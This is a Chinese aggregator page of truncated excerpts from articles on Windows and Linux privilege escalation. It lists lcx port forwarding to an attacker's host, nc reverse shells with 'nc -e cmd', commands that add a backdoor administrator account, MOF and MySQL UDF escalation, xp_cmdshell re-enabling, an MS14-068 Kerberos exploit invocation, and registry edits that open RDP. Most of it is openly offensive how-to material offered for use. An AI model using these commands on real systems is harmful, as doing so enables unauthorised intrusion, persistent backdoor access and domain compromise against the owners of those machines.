cmd+lcx+nc+sc提权工具总结】的更多相关文章

cmd:执行命令的载体cmdshell lcx:端口映射工具 1.在自己的host上的cmd下运行:lcx.exe -listen 51 3389 //意思是监听51端口并转发到3389端口 2.在服务器器上运行:lcx.exe -slave myip 51 serverip 3389 //意思是把服务器的3389端口转发到自己的host的51端口 3.在自己的host上的cmd下运行mstsc,输入127.0.0.1:3389远程连接服务器 nc:监听工具 A:基本用法 1.连接到REMOTE…
工具: iislpe.exe 编译: .net 3.5 全版本IIS提权工具,支持IIS应用池用户/网络服务用户/本地服务用户 原理:       通过NTLM重放将权限提升至SYSTEM权限,详情参考Potato. 用法: IIS Priviledge by k8gegeIIS APPPOOL / Network Service / Local ServiceUseage:iislpe c:\any.batiislpe c:\any.exe 下载:https://files.cnblogs.c…
在单用户的机器上密码可能没那么重要,但是一旦有多个用户可以使用这台机器,密码就显得十分必要了(比如有儿童账户的电脑).所以说为你的电脑增设一条防线的最常用,最简单的方法就是用密码将你的电脑保护起来,但是现如今这道防线已经不是那么牢不可破了. 前言 在打算给一台电脑排除故障的时候,一种最常见,且最令人头疼的事情就是忘记了密码,而这个问题对于聪明人来说并不是看上去的那么棘手,因为他们有多种方法可以在不知道密码的情况下绕过登录. 比如说如果没人知道密码,那么密码可以从用户账户移除,并用一个启动盘中的程…
[原创]添加系统用户 VBS提权脚本随机加密生成器[K.8] 2011-05-05 02:42:53|  分类: 原创工具 VBS提权脚本随机加密生成器[K.8]  Author: QQ吻 QQ:396890445Team: Crack8_编程小组[K.8]Blog: http://qqhack8.blog.163.com 说明:无net.exe.net1.exe提权,可以试试用这个vbs脚本添加系统用户,它通过WSCRIPT.NETWORK来添加用户好处:1 防止某些人 从你提权后 忘了删除的…
名字:     AsSystemRun 功能:     用system权限启动一个进程. 开发语言:   C++,C# 作者:     Ack-Code 开发时间: 2016.9.15 实现原理: windows启动服务的时候会默认system权限的,这样的话我们可以自己开发一个服务程序,然后在服务程序里留好通讯接口,然后在开发一套操作界面程序,让界面程序把使用者的请求发送到服务里面,服务程序在启动进程,system程序启动的任何进程,如果不经过降权处理,那么将是system权限的.这样实现了用…
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: 自动添加批处理文件管理员权限 :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::@echo offCLSECHO.ECHO ==========================…
[ web提权 ] 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user 2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试一般就可以了. 3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的,cmd.exe/cmd.com…
0x01 简介 COM组件是微软开发的一种新软件开发技术,在这个COM框架的下,可以开发出多功能的组件,可以根据自己的需求进行定制开发,替换旧的组件,多个功能组件组合到一起,从而形成了一个复杂的定制化多功能系统. 0x02 影响版本 Windows10,包括1511.1607.1703这三个版本 Windows 7 SP1 Windows 8.1.RT8.1 Windows Server 2008 SP2.2008R2 SP1 Windows Server 2012.2012R2 Windows…
MOF提权 MOF文件是mysql数据库的扩展文件(在c:/windows/system32/wbem/mof/nullevt.mof) 叫做”托管对象格式”,其作用是每隔五秒就会去监控进程创建和死亡 MOF提权原理 MOF文件既然每五秒就会执行,而且是系统权限,我们通过mysql将文件写入一个MOF文件替换掉原有的MOF文件,然后系统每隔五秒就会执行一次我们上传的MOF.MOF当中有一段是vbs脚本,我们可以通过控制这段vbs脚本的内容让系统执行命令,进行提权. 利用条件 Windows<=2…
--------------------------------------------------------------------------------- 声明:本文仅做学习,实验主机为虚拟机,请勿用于非法用途 --------------------------------------------------------------------------------- 影响版本: windows_10:- windows_10: windows_10: windows_10: win…
经验证,诸多版本的Windows系统均存在该漏洞,文末同时附带一份利用该漏洞制作的提权工具,以供学习.经测试该工具支持Win2003 x32/x64.WinXP x32.Win7 x32/x64, Win2008 x32/64. 一.去github上面下在攻击的exp 链接:https://github.com/unamer/CVE-2018-8120 二.环境搭建 windows 7 sp1 x64 1.打开cmd,输入whoami,查询当前用户权限,可以看不到不是system权限. 2.把e…
MS14-068域提权漏洞复现 一.漏洞说明 改漏洞可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限. 微软官方解释: https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2014/ms14-068 二.漏洞原理 Kerberos认证原理:https://www.cnblogs.com/huamingao/p/7267423.html 服务票据是客户端直接发送给服务器,并请求服务资源的.如果服务器…
日期:2018-04-03 11:46:45 作者:Bay0net 介绍:利用 mssql 的 sa 账号提权.利用 MySQL 的 UDF 提权 0x01.mssql 提权 恢复 xp_cmdshell 几个命令 # 查看是否存在 xp_cmdshell(返回非 0 即存在) select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'; # 不存在的话可以添加 EXEC sp_addexte…
ms14-068提权 工具利用 a)拿下边界机win7,并已经有win7上任意一个账号的密码 -u 用户名@域 -p 用户密码 -s 用户sid -d 域控 ms14-068.exe -u test3@superman.com -p Test#123 -s S-1-5-21-2030659959-700672918-1434258406-1113 -d win08.superman.com 生成一个ccache后缀票据 导入票据 导入之前,清空票据缓存 kerberos::purge kerbe…
一.获取Mysql登录账号和密码 1.数据库提权需要知道数据库的账号密码.以及它的配置文件,一般配置文件都在网站的根目录下,这些配置文件命名有鲜明的特征,如:conn.config.data.sql.common.inc等等 以上这些文件都有包含连接数据库的信息,包括连接账号,密码,数据库名等等, 2.如果在这些文件里找不到需要连接数据库的信息,可以到数据库的安装目录下找,默认目录为:C:\phpStudy2016\MySQL\data\mysql,在此目录下找到user.myd文件,里面记录了…
Win提权思路,方法,工具(小总结)[转] 看到这个文章,感觉整理的不错,就收藏下了. 介绍 windows提权总是被归结为适当的枚举.但要完成适当的枚举,你需要知道要检查和查找的内容.这通常需要伴随着经验的丰富而对系统非常熟悉.起初特权升级看起来像是一项艰巨的任务,但过了一段时间,你就开始过滤哪些是正常的东西,而哪些不是正常的东西.最终变得更容易,因为你知道要寻找什么了,而不是挖掘希望在干草堆中找到那根针的所有东西.希望本指南能为你的入门提供良好的基础知识. 所以本指南主要集中在枚举方面. 注…
很多时候linux拿到shell了,然后在菜刀或Shell里执行简单命令不允许!说明权限很死或者被管理禁止了!这里我已NC将SHELL反弹回本地提权!先看下linux内核 2.6.18-194.11.3.el5 内核 ,这个好CentOS release 5.5的系统! 找个外网IP 监听12666,当然12666也可以改.我这里用NC监听nc -l -n -v -p 12666 然后再点你shell 连接成功就出现下面的内容 然后百度找2.6.18-194这个内核的EXP,我已经收藏过.然后通…
Server-U等都不可以用的情况下.   一般都可思考用此方法不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口…   那么这种方法也失效了…. 1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)web目录都是有写有读的权限,我们直接传NC进去 2:然后本地执行nc -vv -lp 52进行反弹 3:在shell命令下执行F:\wwwroot\img\nc.exe  -e cmd上传路径  IP(外网IP)  52(这…
0x00 工具介绍 前言 BeRoot是一个后期开发工具,用于检查常见的Windows的配置错误,以方便找到提高我们提权的方法.其二进制编译地址为: https://github.com/AlessandroZ/BeRoot/releases 它将作为后开发模块被添加到pupy(Pupy是一个开源,跨平台(Windows,Linux,OSX,Android),多功能RAT远程管理工具和后开发工具,主要用python编写)项目中(因此它将在内存中执行,而不会在硬盘中执行). 需要注意的是,这款工具…
ipconfig 显示本地IP地址 net start telnet 开telnet服务 net use z:127.0.0.1c$ 映射对方的C盘 net user 查看所有用户列表 net user hucxsz hucxsz /add 添加用户hucxsz密码为hucxsz net localgroup administrators hucxsz /add 将帐号hucxsz升级为管理员 开3389 REG ADD HKLM\SYSTEM\CurrentControlSet\Control…
又一款linux提权辅助工具 – Linux_Exploit_Suggester 2013-09-06 10:34 1455人阅读 评论(0) 收藏 举报 https://github.com/PenturaLabs/Linux_Exploit_Suggester Linux_Exploit_Suggester是一款根据操作系统版本号自动查找相应提权脚本的工具,如果不带任何参数运行该脚本的话,将执行uname -r返回的操作系统发行版本,或者手工输入-k参数查找指定版本号. 例子: $ perl…
Unix/Linux提权漏洞快速检测工具unix-privesc-check   unix-privesc-check是Kali Linux自带的一款提权漏洞检测工具.它是一个Shell文件,可以检测所在系统的错误配置,以发现可以用于提权的漏洞.该工具适用于安全审计.渗透测试和系统维护等场景.它可以检测与权限相关的各类文件的读写权限,如认证相关文件.重要配置文件.交换区文件.cron job文件.设备文件.其他用户的家目录.正在执行的文件等等.如果发现可以利用的漏洞,就会给出提示warning.…
帮一个兄弟渗透的过程中在内网搜集到了不少oracle连接密码,oracle这么一款强大的数据库,找了一圈发现没有一个方便的工具可以直接通过用户名密码来提权的.想起来自己之前写过一个oracle的连接工具,拿出来分享下.工具没有用到什么新的技术,希望能给做渗透测试的兄弟们节省一点时间. 支持三种工作模式: 1.普通模式: 前提是拥有一个普通的oracle连接账号,不需要DBA权限,可提权只DBA,并以oracle实例运行的权限执行操作系统命令. 2.DBA模式: 拥有DBA账号密码,可以省去自己手…
Enumy是一款功能强大的Linux后渗透提权枚举工具,该工具是一个速度非常快的可移植可执行文件,广大研究人员可以在针对Linux设备的渗透测试以及CTF的后渗透阶段利用该工具实现权限提升,而Enumy运行之后将能够帮助研究人员枚举出目标设备中常见的安全漏洞. 前言 哪些人应该使用Enumy 1.渗透测试人员,可以在目标设备上运行Enumy,并报告发现的安全问题: 2.CTF玩家可以利用Enumy来识别他们原本可能会错过或忽略的东西: 3.想识别本地设备中安全漏洞的话,同样可以使用Enumy:…
一.ssh远程端口转发 背景:当我们在渗透过程中,获取到内网的一台仅有内网IP的服务器后,我们可以通过ssh隧道,将内网某个主机的端口进行远程转发 1.网络拓扑图 假设获取的服务器为web服务器,web服务器将远程内网目标服务器的3389端口,通过ssh远程端口转发给VPS的3307端口,然后在VPS上访问自己本地地址和3307,即可远程到内网的主机 2.实验环境 VPS:192.168.4.134 web服务器:1.1.1.11 数据库服务器:1.1.1.12 3.实验步骤 在web服务器上执…
旁站路径问题: 1.读网站配置. 2.用以下VBS: 01 On Error Resume Next 02   03 If (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") Then 04   05 MsgBox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & " U…
昨天中午打开电脑,对着菜刀在那翻啊翻,找到一个64bit的os. 因为这个ip不在曾经提权过的主机列表里面,心想这应该是个低权限的网站,顺手打个whoami试试,结果给我返回了"nt authoritysystem".看来这是一条"漏网之鱼"啊,于是就有了下面一段颇为蛋疼的经历. 查看系统信息,这是一台装了win server 2008 r2企业版的服务器,跑在VMware虚拟机上. 然后翻了下目录,web环境是Tomcat 5.5.7,搭的是SQL Server…
本文参考自冷逸大佬的博客,源地址在这里:https://lengjibo.github.io/windows%E6%8F%90%E6%9D%83%E6%80%BB%E7%BB%93/ windows提权 windows下的权限: - user - administrator - system 一些常用命令: systeminfo | findstr OS #获取系统版本信息 hostname #获取主机名称 whomai /priv #显示当前用户的安全特权 quser or query use…
上一篇文章我们介绍了信息收集方法和WMIC,今天我们将跟随作者深入学习Windows提权基本原理的内容,希望通过这两篇文章的讲解,大家能够真正掌握这个技能. 推荐阅读:「白帽黑客成长记」Windows提权基本原理(上) 注:文章篇幅较长,阅读用时约10分钟. 在t5-t6阶段,快速攻陷 在继续渗透之前,你需要先回顾一下已经搜集到的信息,信息量应该已经不小了.我们计划的下一步就是要寻找一些能被轻易利用的系统缺陷来提升权限. 显而易见,第一步就是去查看补丁修正情况.如果发现主机已经被打了某些补丁,也…
「白帽黑客成长记」Windows提权基本原理(下) https://www.cnblogs.com/ichunqiu/p/10968674.html 提权.. 之前还在想 为什么 我的 sqlserver 运行在 network service 上面 还能被创建新用户. 上一篇文章我们介绍了信息收集方法和WMIC,今天我们将跟随作者深入学习Windows提权基本原理的内容,希望通过这两篇文章的讲解,大家能够真正掌握这个技能. 推荐阅读:「白帽黑客成长记」Windows提权基本原理(上) 注:文章…